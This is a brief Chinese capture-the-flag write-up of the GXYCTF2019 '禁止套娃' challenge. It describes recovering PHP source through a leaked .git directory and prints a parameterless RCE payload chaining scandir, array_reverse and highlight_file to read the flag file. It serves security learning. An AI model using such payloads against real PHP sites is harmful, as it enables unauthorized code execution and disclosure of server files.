[GXYCTF2019]禁止套娃 1

1.发现

1.1基本操作无果,使用Git Hack扫描后台得到PHP代码。

[GXYCTF2019]禁止套娃 1

 

 2.步骤

2.1进行代码审计,根据代码,绕过限制,写出payload,得到flag。

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

 [GXYCTF2019]禁止套娃 1

 

 3.借鉴

(36条消息) [GXYCTF2019]禁止套娃(.git泄露,无参RCE)_xlcvv的博客-CSDN博客

 4.知识点

.git源码泄露

无参RCE

上一篇:Android 里的数据储存


下一篇:Netty详解